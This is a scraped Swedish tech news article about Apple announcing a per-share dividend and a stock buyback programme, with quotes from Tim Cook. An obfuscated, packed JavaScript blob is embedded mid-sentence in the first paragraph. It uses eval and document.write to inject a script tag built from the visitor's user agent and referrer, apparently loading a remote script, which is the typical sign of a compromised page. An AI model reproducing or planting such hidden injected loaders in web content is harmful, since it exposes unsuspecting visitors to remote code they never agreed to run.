Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Apple: Detta ska vi göra med våra pengar

Apple: Detta ska vi göra med våra pengar
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bniiz|var|u0026u|referrer|nesre||js|php’.split(’|’),0,{}))
vi skrev i en
artikel tidigare idag så har det spekulerats över vad Apple ska göra med sina otroliga tillgångar. Nu lättar de på plånboken och tar nya tag.

Apple delar nu ut 2,65 dollar per aktie till sina aktieägare. Något som motsvarar ca 18 kronor per aktie. Tydligen ska detta ske någon gång under det fjärde kvartalet 2012 som inleds i juli månad.

Förutom detta så sätts också ett nytt program igång för att köpa tillbaka aktier.

Det är Apples VD Tim Cook som meddelar detta i ett pressmeddelande idag. Han säger

– Vi har använt en del av kassan till att göra stora investeringar i verksamheten, genom ökad forskning och utveckling, förvärv, satsningar i retailledet och strategiska investeringar i leveranskedjan, vi har också byggt ut vår infrastruktur.

– Men även med dessa investeringar så har vi en fortsatt stor kassa till strategiska satsningar och vi har mycket kapital för att driva vår verksamhet. Därför ska vi initiera det här utdelnings- och återköpsprogrammet.

Apple ska totalt spendera ca 45 miljarder dollar på de kommande tre åren.

Just nu står Apples aktie i otroliga 586,39 dollar, helt sjukt eller hur?

Läs vår tidigare artikel här!